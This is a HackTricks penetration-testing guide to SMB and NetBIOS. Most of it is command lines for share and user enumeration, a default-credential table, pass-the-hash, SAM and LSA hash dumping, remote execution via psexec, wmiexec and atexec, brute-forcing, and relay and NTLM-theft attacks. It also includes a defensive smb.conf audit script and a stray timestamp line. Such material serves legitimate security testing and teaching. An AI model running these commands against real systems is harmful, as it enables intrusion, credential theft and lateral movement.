hacktricks/network-services-pentesting/pentesting-smb.md

# 139,445 - Pentesting SMB

<details>

<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>

* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? Or do you want access to the **latest version of PEASS or to download HackTricks as a PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**Telegram group**](https://t.me/peass), or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.

</details>

## **Port 139**

**NetBIOS** stands for _Network Basic Input Output System_. It is a software protocol that allows applications, PCs and desktops on a local area network (LAN) to communicate with network hardware and to transmit data across the network. Software applications that run on a NetBIOS network locate and identify each other via their NetBIOS names. A NetBIOS name is up to 16 characters long and is usually separate from the computer name. Two applications start a NetBIOS session when one (the client) sends a command to "call" another client (the server) over **TCP port 139**. (extracted from [here](https://www.thewindowsclub.com/smb-port-what-is-port-445-port-139-used-for))
```
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
```

## Port 445

While port 139 is known technically as "NBT over IP", port 445 is "SMB over IP". **SMB** stands for "**Server Message Blocks**". Server Message Block in modern language is also known as the **Common Internet File System**. The system operates as an application-layer network protocol primarily used for offering shared access to files, printers, serial ports and other sorts of communications between nodes on a network.

For instance, on Windows, SMB can run directly over TCP/IP without the need for NetBIOS over TCP/IP. This will use, as noted above, port 445. On other systems you will find services and applications using port 139, which means that SMB is running with NetBIOS over TCP/IP. (extracted from [here](https://www.thewindowsclub.com/smb-port-what-is-port-445-port-139-used-for))
```
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
```

### SMB

Server Message Block (`SMB`) is a **client-server** protocol that regulates access to files, entire directories and other network resources such as printers, routers or interfaces released to the network. The main application area of the protocol has been the **Windows** operating system series in particular, whose network services support SMB in a downward-compatible manner, which means that devices with newer editions can easily communicate with devices that have an older Microsoft operating system installed.\
With the free software project **Samba** there is also a solution that enables the use of **SMB** in Linux and Unix distributions, and thus cross-platform communication via SMB.

An SMB server can provide **arbitrary parts of its local file system as shares**. Therefore the **hierarchy** visible to a client is partially **independent of the structure on the server**. **Access rights** are defined by `access control lists` (`ACL`). They can be **controlled in a fine-grained manner** based on attributes such as **`execute`**, **`read`** and **`full access`** for individual users or user groups. The **ACLs** are defined per share and therefore do not correspond to the rights assigned locally on the server.

### IPC$ Share

From the book _**Network Security Assessment 3rd edition**_:

Through an anonymous null session you can access the IPC$ share and interact with services exposed via named pipes. The enum4linux utility within Kali Linux is particularly useful; with it, you can obtain the following:

* Operating system information
* Details of the parent domain
* A list of local users and groups
* Details of available SMB shares
* The effective system security policy

## What is NTLM

If you don't know what NTLM is, or you want to know how it works and how to abuse it, you will find this page about **NTLM** very interesting, where it is explained **how this protocol works and how you can take advantage of it:**
2022-10-04 23:49:59 +00:00
{% content-ref url="../windows-hardening/ntlm/" %}
[ntlm](../windows-hardening/ntlm/)
{% endcontent-ref %}

## **Server Enumeration**

### **Scan** a network searching for hosts:
```bash
nbtscan -r 192.168.0.1/24
```
### SMB server version

To look for possible exploits of the SMB version, it is important to know which version is being used. If this information does not appear in the other tools you used, you can:

* Use the **MSF** auxiliary module **auxiliary/scanner/smb/smb\_version**
* Or use this script:

```bash
#!/bin/sh
#Author: rewardone
#Description:
# Requires root or enough permissions to use tcpdump
# Will listen for the first 7 packets of a null login
# and grab the SMB Version
#Notes:
# Will sometimes not capture or will print multiple
# lines. May need to run a second time for success.
# The capture interface (tap0) is hardcoded below; change it to match your setup.
if [ -z "$1" ]; then echo "Usage: ./smbver.sh RHOST {RPORT}" && exit; else rhost="$1"; fi
if [ -n "$2" ]; then rport="$2"; else rport=139; fi
# Sniff the server's replies to the null login in the background, extract the "Unix Samba x.y.z" banner
tcpdump -s0 -n -i tap0 src "$rhost" and port "$rport" -A -c 7 2>/dev/null | grep -i "samba\|s.a.m" | tr -d '.' | grep -oP 'UnixSamba.*[0-9a-z]' | tr -d '\n' & echo -n "$rhost: " &
# Trigger the null login that produces the packets above
echo "exit" | smbclient -L "$rhost" 1>/dev/null 2>/dev/null
echo "" && sleep .1
```

### **Search exploits**

To search for exploits, you can use various tools and resources. Here are some common methods:

- **Exploit Databases**: Websites like Exploit-DB, Rapid7, and Metasploit provide extensive databases of known exploits. You can search these databases using relevant keywords or specific vulnerabilities.
- **Vulnerability Scanners**: Tools like Nessus, OpenVAS, and Nexpose can scan networks and systems for known vulnerabilities and provide a list of potential exploits.
- **Security Bulletins**: Software vendors and security organizations often release security bulletins that detail vulnerabilities and their associated exploits. These bulletins can be found on the vendor's website or through security advisory services.
- **Exploit Frameworks**: Frameworks like Metasploit offer a wide range of exploits and payloads that can be used for penetration testing. These frameworks provide a command-line interface for searching and executing exploits.

Remember to always use these tools and resources responsibly and with proper authorization. Unauthorized exploitation of vulnerabilities is illegal and unethical.
```bash
msf> search type:exploit platform:windows target:2008 smb
searchsploit microsoft smb
```

### **Possible** Credentials

| **Username(s)**      | **Common passwords**                      |
| -------------------- | ----------------------------------------- |
| _(blank)_            | _(blank)_                                 |
| guest                | _(blank)_                                 |
| Administrator, admin | _(blank)_, password, administrator, admin |
| arcserve             | arcserve, backup                          |
| tivoli, tmersrvd     | tivoli, tmersrvd, admin                   |
| backupexec, backup   | backupexec, backup, arcada                |
| test, lab, demo      | password, test, lab, demo                 |

### SMB Environment Information

### Obtain Information
```bash
#Dump interesting information
enum4linux -a [-u "<username>" -p "<passwd>"] <IP>
enum4linux-ng -A [-u "<username>" -p "<passwd>"] <IP>
nmap --script "safe or smb-enum-*" -p 445 <IP>

#Connect to the rpc
rpcclient -U "" -N <IP> #No creds
rpcclient //machine.htb -U domain.local/USERNAME%754d87d42adabcca32bdb34a876cbffb --pw-nt-hash
rpcclient -U "username%passwd" <IP> #With creds
#You can use querydispinfo and enumdomusers to query user information

#Dump user information
/usr/share/doc/python3-impacket/examples/samrdump.py -port 139 [[domain/]username[:password]@]<targetName or address>
/usr/share/doc/python3-impacket/examples/samrdump.py -port 445 [[domain/]username[:password]@]<targetName or address>

#Map possible RPC endpoints
/usr/share/doc/python3-impacket/examples/rpcdump.py -port 135 [[domain/]username[:password]@]<targetName or address>
/usr/share/doc/python3-impacket/examples/rpcdump.py -port 139 [[domain/]username[:password]@]<targetName or address>
/usr/share/doc/python3-impacket/examples/rpcdump.py -port 445 [[domain/]username[:password]@]<targetName or address>
```

### Enumerate users, groups & logged-on users

```bash
# This info should already have been gathered by enum4linux and enum4linux-ng
crackmapexec smb 10.10.10.10 --users [-u <username> -p <password>]
crackmapexec smb 10.10.10.10 --groups [-u <username> -p <password>]
crackmapexec smb 10.10.10.10 --groups --loggedon-users [-u <username> -p <password>]

ldapsearch -x -b "DC=DOMAIN_NAME,DC=LOCAL" -s sub "(&(objectclass=user))" -h 10.10.10.10 | grep -i samaccountname: | cut -f 2 -d " "

rpcclient -U "" -N 10.10.10.10
enumdomusers
enumdomgroups
```
### Enumerate local users

[Impacket](https://github.com/fortra/impacket/blob/master/examples/lookupsid.py)

```bash
lookupsid.py -no-pass hostname.local
```

```bash
# Walk RIDs 500-1100 over a null session and print the users/groups that resolve
for i in $(seq 500 1100);do rpcclient -N -U "" 10.10.10.10 -c "queryuser 0x$(printf '%x\n' "$i")" | grep "User Name\|user_rid\|group_rid" && echo "";done
```

### Metasploit - Enumerate local users

```bash
use auxiliary/scanner/smb/smb_lookupsid
set rhosts hostname.local
run
```
### **Enumerating LSARPC and SAMR rpcclient**

{% content-ref url="pentesting-smb/rpcclient-enumeration.md" %}
[rpcclient-enumeration.md](pentesting-smb/rpcclient-enumeration.md)
{% endcontent-ref %}

### GUI connection from linux

#### In the terminal:

`xdg-open smb://cascade.htb/`

#### In file browser window (nautilus, thunar, etc)

`smb://friendzone.htb/general/`

## Shared Folders Enumeration
### List shared folders

It is always recommended to check whether you can access anything; if you don't have credentials, try using **null credentials/guest user**.

```bash
smbclient --no-pass -L //<IP> # Null user
smbclient -U 'username[%passwd]' -L [--pw-nt-hash] //<IP> # If you omit the password it will be prompted. With --pw-nt-hash, the password provided is the NT hash

smbmap -H <IP> [-P <PORT>] # Null user
smbmap -u "username" -p "password" -H <IP> [-P <PORT>] # Credentials
smbmap -u "username" -p "<NT>:<LM>" -H <IP> [-P <PORT>] # Pass-the-Hash
smbmap -R -u "username" -p "password" -H <IP> [-P <PORT>] # Recursive list

crackmapexec smb <IP> -u '' -p '' --shares # Null user
crackmapexec smb <IP> -u 'username' -p 'password' --shares # Guest user
crackmapexec smb <IP> -u 'username' -H '<HASH>' --shares # Guest user
```
### **Connect/List a shared folder**
```bash
# Connect using smbclient
smbclient --no-pass //<IP>/<Folder>
smbclient -U 'username[%passwd]' -L [--pw-nt-hash] //<IP> # If you omit the password it will be prompted. With --pw-nt-hash, the password provided is the NT hash
# Use --no-pass -c 'recurse;ls' to list recursively with smbclient

# List with smbmap; without a folder it lists everything
smbmap [-u "username" -p "password"] -R [Folder] -H <IP> [-P <PORT>] # Recursive list
smbmap [-u "username" -p "password"] -r [Folder] -H <IP> [-P <PORT>] # Non-recursive list
smbmap -u "username" -p "<NT>:<LM>" [-r/-R] [Folder] -H <IP> [-P <PORT>] # Pass-the-Hash
```
### **Manually enumerate windows shares and connect to them**
It may be possible that you are restricted from listing any shares of the host machine, so that when you try to list them it appears as if there aren't any shares to connect to. Thus it might be worth a shot to try to connect to a share manually. To enumerate the shares manually you might want to look for responses like NT\_STATUS\_ACCESS\_DENIED and NT\_STATUS\_BAD\_NETWORK\_NAME when using a valid session (e.g. null session or valid credentials). These indicate, respectively, that the share exists but you do not have access to it, or that the share does not exist at all.
Common share names for windows targets are
* C$
* D$
* ADMIN$
* IPC$
* PRINT$
* FAX$
* SYSVOL
* NETLOGON
(Common share names from _**Network Security Assessment 3rd edition**_)
You can try to connect to them by using the following command
```bash
# Connect to a Windows share with a null session
smbclient -U '%' -N \\\\<IP>\\<SHARE>

# Connect to a Windows share with an authenticated session (you will be prompted for a password)
smbclient -U '<USER>' \\\\<IP>\\<SHARE>
```
or this script (using a null session)
```bash
#!/bin/bash
ip='<TARGET-IP-HERE>'
shares=('C$' 'D$' 'ADMIN$' 'IPC$' 'PRINT$' 'FAX$' 'SYSVOL' 'NETLOGON')
for share in "${shares[@]}"; do
    # Capture stderr too, since smbclient reports NT_STATUS errors there
    output=$(smbclient -U '%' -N "\\\\$ip\\$share" -c '' 2>&1)
    if [[ -z $output ]]; then
        echo "[+] creating a null session is possible for $share" # no output if the command goes through, so assume a session was created
    else
        echo "$output" # echo the error message (e.g. NT_STATUS_ACCESS_DENIED or NT_STATUS_BAD_NETWORK_NAME)
    fi
done
```

Examples:

```bash
smbclient -U '%' -N \\\\192.168.0.24\\im_clearly_not_here # returns NT_STATUS_BAD_NETWORK_NAME
smbclient -U '%' -N \\\\192.168.0.24\\ADMIN$ # returns NT_STATUS_ACCESS_DENIED or even gives you a session
```
### Mount a shared folder

```bash
mount -t cifs //x.x.x.x/share /mnt/share
mount -t cifs -o "username=user,password=password" //x.x.x.x/share /mnt/share
```
### **Download files**
Read previous sections to learn how to connect with credentials/Pass-the-Hash.
```bash
# Search for a file and download it
sudo smbmap -R Folder -H <IP> -A <FileName> -q # Search the file in recursive mode and download it inside /usr/share/smbmap
```

```bash
# Download everything
smbclient //<IP>/<share>
> mask ""
> recurse
> prompt
> mget *
# Downloads everything to the current directory
```
Commands:
* mask: specifies the mask which is used to filter the files within the directory (e.g. "" for all files)
* recurse: toggles recursion on (default: off)
* prompt: toggles prompting for filenames off (default: on)
* mget: copies all files matching the mask from host to client machine
(_Information from the manpage of smbclient_)
### Domain Shared Folders Search

* [**Snaffler**](https://github.com/SnaffCon/Snaffler)

```bash
Snaffler.exe -s -d domain.local -o snaffler.log -v data
```

* [**CrackMapExec**](https://wiki.porchetta.industries/smb-protocol/spidering-shares) spider.
  * `-M spider_plus [--share <share_name>]`
  * `--pattern txt`

```bash
sudo crackmapexec smb 10.10.10.10 -u username -p pass -M spider_plus --share 'Department Shares'
```

Especially interesting files to look for in shares are **`Registry.xml`**, as it **may contain passwords** for users configured with **autologon** via Group Policy, and **`web.config`** files, as they often contain credentials.

{% hint style="info" %}
The **SYSVOL share** is **readable** by all authenticated users in the domain. In there you may **find** many different batch, VBScript and PowerShell **scripts**.\
You should **check** the **scripts** inside of it as you might **find** sensitive info such as **passwords**.
{% endhint %}

## Read Registry
You may be able to **read the registry** using some discovered credentials. Impacket **`reg.py`** allows you to try:

```bash
sudo reg.py domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a876cb7e6:1a3487d42adaa12332bdb34a876cb7e6 query -keyName HKU -s
sudo reg.py domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a876cb7e6:1a3487d42adaa12332bdb34a876cb7e6 query -keyName HKCU -s
sudo reg.py domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a876cb7e6:1a3487d42adaa12332bdb34a876cb7e6 query -keyName HKLM -s
```

## Post Exploitation
The **default config of** a **Samba** server is usually located in `/etc/samba/smb.conf` and might have some **dangerous configs**:
| **Setting** | **Description** |
| --------------------------- | ------------------------------------------------------------------- |
| `browseable = yes` | Allow listing available shares in the current share? |
| `read only = no` | Forbid the creation and modification of files? |
| `writable = yes` | Allow users to create and modify files? |
| `guest ok = yes` | Allow connecting to the service without using a password? |
| `enable privileges = yes` | Honor privileges assigned to specific SID? |
| `create mask = 0777` | What permissions must be assigned to the newly created files? |
| `directory mask = 0777` | What permissions must be assigned to the newly created directories? |
| `logon script = script.sh` | What script needs to be executed on the user's login? |
| `magic script = script.sh` | Which script should be executed when the script gets closed? |
| `magic output = script.out` | Where the output of the magic script needs to be stored? |
The command `smbstatus` gives information about the **server** and about **who is connected**.
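As an added example (not part of the original page or of Samba), the following shell function audits an `smb.conf` for the risky settings in the table above, so a defender can spot them before a tester does. It runs against a constructed config containing one weak share (`public`) and one hardened share (`finance`); `browseable` is deliberately not flagged, since listing a share is not by itself a weakness.

```bash
#!/bin/bash
# Added example: audit a Samba smb.conf for the dangerous settings listed above.
# Point audit_smb_conf at the contents of /etc/samba/smb.conf on a real host.

# Constructed sample config: one weak share and one hardened share.
SAMPLE_CONF='[global]
   workgroup = WORKGROUP
   map to guest = Bad User

[public]
   path = /srv/samba/public
   browseable = yes
   writable = yes
   guest ok = yes
   create mask = 0777
   directory mask = 0777
   logon script = script.sh

[finance]
   path = /srv/samba/finance
   browseable = no
   read only = yes
   guest ok = no
   create mask = 0660
   directory mask = 0770
'

# Print one line per finding in the form "<share>: <setting> = <value>".
# $1 is the config text. Comments are skipped; keys are compared case-insensitively.
audit_smb_conf() {
    printf '%s\n' "$1" | awk '
        /^[[:space:]]*[;#]/ { next }                       # skip comment lines
        /^[[:space:]]*\[.*\][[:space:]]*$/ {               # [section] header
            gsub(/^[[:space:]]*\[|\][[:space:]]*$/, ""); section = $0; next
        }
        /=/ {
            key = $0; sub(/=.*/, "", key); gsub(/^[[:space:]]+|[[:space:]]+$/, "", key)
            val = $0; sub(/^[^=]*=/, "", val); gsub(/^[[:space:]]+|[[:space:]]+$/, "", val)
            k = tolower(key); v = tolower(val)
            flag = 0
            if (k == "guest ok"  && v == "yes") flag = 1      # password-less access
            if (k == "writable"  && v == "yes") flag = 1      # anyone allowed in can write
            if (k == "writeable" && v == "yes") flag = 1      # Samba synonym
            if (k == "read only" && v == "no")  flag = 1      # same meaning as writable = yes
            if (k == "create mask"    && v ~ /[2367]$/) flag = 1   # "others" get write on new files
            if (k == "directory mask" && v ~ /[2367]$/) flag = 1   # "others" get write on new dirs
            if (k == "logon script" || k == "magic script") flag = 1  # server-side script hooks
            if (k == "enable privileges" && v == "yes") flag = 1
            if (flag) printf "%s: %s = %s\n", section, key, val
        }
    '
}

# Number of findings, for use by other scripts or checks.
count_findings() {
    audit_smb_conf "$1" | awk 'END { print NR }'
}

# Demo run against the constructed config: prints the five findings for [public].
audit_smb_conf "$SAMPLE_CONF"
```

The same function run over a real `/etc/samba/smb.conf` (`audit_smb_conf "$(cat /etc/samba/smb.conf)"`) lists every share that would let a guest or any authenticated user write, or that wires a script to logon.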
## Authenticate using Kerberos

You can **authenticate** to **Kerberos** using the tools **smbclient** and **rpcclient**:

```bash
smbclient --kerberos //ws01win10.domain.com/C$
rpcclient -k ws01win10.domain.com
```

## **Execute Commands**

### **crackmapexec**

crackmapexec can execute commands **abusing** any of **mmcexec, smbexec, atexec, wmiexec**, with **wmiexec** being the **default** method. You can indicate which option you prefer to use with the parameter `--exec-method`:

```bash
apt-get install crackmapexec

crackmapexec smb 192.168.10.11 -u Administrator -p 'P@ssw0rd' -X '$PSVersionTable' # Execute PowerShell
crackmapexec smb 192.168.10.11 -u Administrator -p 'P@ssw0rd' -x whoami # Execute cmd
crackmapexec smb 192.168.10.11 -u Administrator -H <NTHASH> -x whoami # Pass-the-Hash
# Choose the execution method
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --exec-method {mmcexec,smbexec,atexec,wmiexec}

crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --sam # Dump SAM
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --lsa # Dump LSASS in-memory hashes
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --sessions # Get sessions
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --loggedon-users # Get logged-on users
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --disks # Enumerate the disks
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --users # Enumerate users
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --groups # Enumerate groups
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --local-groups # Enumerate local groups
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --pass-pol # Get password policy
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --rid-brute # RID brute force
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -H <HASH> # Pass-The-Hash
```


### [**psexec**](../windows-hardening/ntlm/psexec-and-winexec.md)**/**[**smbexec**](../windows-hardening/ntlm/smbexec.md)

Both options will **create a new service** (using _\pipe\svcctl_ via SMB) in the victim machine and use it to **execute something** (**psexec** will **upload** an executable file to the ADMIN$ share, while **smbexec** will point the service to **cmd.exe/powershell.exe** and put the payload in the arguments, a **file-less technique**).\
**More info** about [**psexec**](../windows-hardening/ntlm/psexec-and-winexec.md) and [**smbexec**](../windows-hardening/ntlm/smbexec.md).\
In **kali** it is located at /usr/share/doc/python3-impacket/examples/

```bash
# If no password is provided, it will be prompted
./psexec.py [[domain/]username[:password]@]<targetName or address>
./psexec.py -hashes <LM:NT> administrator@10.10.10.103 # Pass-the-Hash
psexec \\192.168.122.66 -u Administrator -p 123456Ww
psexec \\192.168.122.66 -u Administrator -p q23q34t34twd3w34t34wtw34t # Pass-the-Hash
```

Using the **parameter** `-k` you can authenticate against **Kerberos** instead of **NTLM**.
### [wmiexec](../windows-hardening/ntlm/wmicexec.md)/dcomexec
Stealthily execute a command shell without touching the disk or running a new service using DCOM via **port 135.**\
In **kali** it is located on /usr/share/doc/python3-impacket/examples/
```bash
# If no password is provided, it will be prompted
./wmiexec.py [[domain/]username[:password]@]<targetName or address> # Prompts for the password
./wmiexec.py -hashes LM:NT administrator@10.10.10.103 # Pass-the-Hash
# You can append a CMD command to the end of the command line to execute it; if you don't, a semi-interactive shell is opened
```

Using the **parameter** `-k` you can authenticate against **Kerberos** instead of **NTLM**.

```bash
# If no password is provided, it will be prompted
./dcomexec.py [[domain/]username[:password]@]<targetName or address>
./dcomexec.py -hashes <LM:NT> administrator@10.10.10.103 # Pass-the-Hash
# You can append a CMD command to the end of the command line to execute it; if you don't, a semi-interactive shell is opened
```
### [AtExec](../windows-hardening/ntlm/atexec.md)
Execute commands via the Task Scheduler (using _\pipe\atsvc_ via SMB).\
In **kali** it is located on /usr/share/doc/python3-impacket/examples/
```bash
./atexec.py [[domain/]username[:password]@]<targetName or address> "command"
./atexec.py -hashes <LM:NT> administrator@10.10.10.175 "whoami"
```

## Impacket reference
[https://www.hackingarticles.in/beginners-guide-to-impacket-tool-kit-part-1/](https://www.hackingarticles.in/beginners-guide-to-impacket-tool-kit-part-1/)
## **Bruteforce users credentials**
**This is not recommended, you could block an account if you exceed the maximum allowed tries**
```bash
nmap --script smb-brute -p 445 <IP>
ridenum.py <IP> 500 50000 /root/passwds.txt # Get usernames by brute-forcing RIDs, then try to brute-force each username
```

## SMB relay attack
This attack uses the Responder toolkit to **capture SMB authentication sessions** on an internal network, and **relays** them to a **target machine**. If the authentication **session is successful**, it will automatically drop you into a **system** **shell**.\
[**More information about this attack here.**](../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md)
## SMB-Trap
The Windows library URLMon.dll automatically tries to authenticate to the host when a page tries to access some content via SMB, for example: `img src="\\10.10.10.10\path\image.jpg"`
This happens with the functions:
* URLDownloadToFile
* URLDownloadToCache
* URLOpenStream
* URLOpenBlockingStream
Which are used by some browsers and tools (like Skype)
![From: http://www.elladodelmal.com/2017/02/como-hacer-ataques-smbtrap-windows-con.html](<../.gitbook/assets/image (93).png>)
### SMBTrap using MitMf
![From: http://www.elladodelmal.com/2017/02/como-hacer-ataques-smbtrap-windows-con.html](<../.gitbook/assets/image (94).png>)

## NTLM Theft

Similar to SMB Trapping, planting malicious files onto a target system (via SMB, for example) can elicit an SMB authentication attempt, allowing the NetNTLMv2 hash to be intercepted with a tool such as Responder. The hash can then be cracked offline or used in an [SMB relay attack](pentesting-smb.md#smb-relay-attack).

[See: ntlm\_theft](../windows-hardening/ntlm/places-to-steal-ntlm-creds.md#ntlm\_theft)
## HackTricks Automatic Commands

```
Protocol_Name: SMB    #Protocol Abbreviation if there is one.
Port_Number:  137,138,139     #Comma separated if there is more than one.
Protocol_Description: Server Message Block         #Protocol Abbreviation Spelled out

Entry_1:
  Name: Notes
  Description: Notes for SMB
  Note: |
    While Port 139 is known technically as 'NBT over IP', Port 445 is 'SMB over IP'. SMB stands for 'Server Message Blocks'. Server Message Block in modern language is also known as Common Internet File System. The system operates as an application-layer network protocol primarily used for offering shared access to files, printers, serial ports, and other sorts of communications between nodes on a network.

    #These are the commands I run in order every time I see an open SMB port

    With No Creds
    nbtscan {IP}
    smbmap -H {IP}
    smbmap -H {IP} -u null -p null
    smbmap -H {IP} -u guest
    smbclient -N -L //{IP}
    smbclient -N //{IP}/ --option="client min protocol"=LANMAN1
    rpcclient {IP}
    rpcclient -U "" {IP}
    crackmapexec smb {IP}
    crackmapexec smb {IP} --pass-pol -u "" -p ""
    crackmapexec smb {IP} --pass-pol -u "guest" -p ""
    GetADUsers.py -dc-ip {IP} "{Domain_Name}/" -all
    GetNPUsers.py -dc-ip {IP} -request "{Domain_Name}/" -format hashcat
    GetUserSPNs.py -dc-ip {IP} -request "{Domain_Name}/"
    getArch.py -target {IP}

    With Creds
    smbmap -H {IP} -u {Username} -p {Password}
    smbclient "\\\\{IP}\\\" -U {Username} -W {Domain_Name} -l {IP}
    smbclient "\\\\{IP}\\\" -U {Username} -W {Domain_Name} -l {IP} --pw-nt-hash `hash`
    crackmapexec smb {IP} -u {Username} -p {Password} --shares
    GetADUsers.py {Domain_Name}/{Username}:{Password} -all
    GetNPUsers.py {Domain_Name}/{Username}:{Password} -request -format hashcat
    GetUserSPNs.py {Domain_Name}/{Username}:{Password} -request

    https://book.hacktricks.xyz/pentesting/pentesting-smb

Entry_2:
  Name: Enum4Linux
  Description: General SMB Scan
  Command: enum4linux -a {IP}

Entry_3:
  Name: Nmap SMB Scan 1
  Description: SMB Vuln Scan With Nmap
  Command: nmap -p 139,445 -vv -Pn --script=smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-ms17-010.nse {IP}

Entry_4:
  Name: Nmap SMB Scan 2
  Description: SMB Vuln Scan With Nmap (Less Specific)
  Command: nmap --script smb-vuln* -Pn -p 139,445 {IP}

Entry_5:
  Name: Hydra Brute Force
  Description: Need User
  Command: hydra -t 1 -V -f -l {Username} -P {Big_Passwordlist} {IP} smb

Entry_6:
  Name: SMB/SMB2 139/445 consoleless msf enumeration
  Description: SMB/SMB2 139/445 enumeration without the need to run msfconsole
  Note: sourced from https://github.com/carlospolop/legion
  Command: msfconsole -q -x 'use auxiliary/scanner/smb/smb_version; set RHOSTS {IP}; set RPORT 139; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smb/smb2; set RHOSTS {IP}; set RPORT 139; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smb/smb_version; set RHOSTS {IP}; set RPORT 445; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smb/smb2; set RHOSTS {IP}; set RPORT 445; run; exit'
```